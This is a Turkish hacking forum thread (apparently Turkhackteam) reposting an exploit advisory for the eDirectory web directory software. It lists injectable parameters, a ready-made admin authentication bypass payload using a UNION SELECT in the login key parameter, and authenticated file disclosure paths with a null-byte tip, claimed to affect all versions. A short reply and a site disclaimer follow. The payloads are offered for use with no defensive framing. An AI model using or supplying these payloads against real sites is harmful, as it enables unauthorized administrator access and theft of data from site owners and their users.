eDirectory - SQL Injection

BAGAY

Katılımcı Üye
13 Tem 2014
652
0
127.0.0.1
# Exploit Title/Exploit Başlığı: Admin auth bypass, SQLi and File Disclosure
# Dork: N/A
# Date/Tarih: Mart2019
# Exploit Author/Exploit Yazarı: Efren Diaz
# Vendor Homepage/Yapımcı Sitesi: https://www.edirectory.com/
# Software Link/Yazılımın Linki: N/A
# Version/Versiyon: Bütün versiyonlar
# Tested on/Test Edilen Sistem: Ubuntu 14.04
# CVE : N/A

#Description/Açıklama:
eDirectory, kendi şirket web sitenizi, işletme rehberlerinizi, kupon sitelerinizi, yerel rehberinizi, öncü gen sitelerini ve daha fazlasını oluşturmak için bir web tabanlı bir yazılımdır.

# Administrator Login Bypass
Login SQL injection, yönetini kimlik doğrulamasını önlemek ve direkt olarak admin panele bağlanmamız için kullanılan bir yöntemdir.

# SQL Injection
Links/Linkler:
- https://site.com/lo cation.php?type=byId&id=[INT]&childLevel=[INT]&level=[SQLi]
- https://site.com/sitemgr/login.php?key=[SQLi]

# Administrator Login Bypass
Link: https://site.com/sitemgr/login.php?key=' union select 0,1,0,'sitemgr' -- -


# File Disclosure (authenticated)
Not:Sadece .php uzantılı dosyalar,fakat eski .php uzantılı dosyalar için null-byte ı deneyin.
Links:
- https://site.com/sitemgr/langcenter...age_area=front&domain_id=1&language_id=[PATH]
- https://site.com/sitemgr/configurat...age_area=front&domain_id=1&language_id=[PATH]
 

Roothaning

Katılımcı Üye
1 Ocak 2019
653
2
Vpnsizde girilebiliyor sizde problem olmasın . Bu arada alttaki linkleri kast ediyorsanız onlar yapcanız işlem için örnek giriş biçimi site adı .com .net site her neyse sanırım ondan bahsediyorsunuz :)
 
Son düzenleme:
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.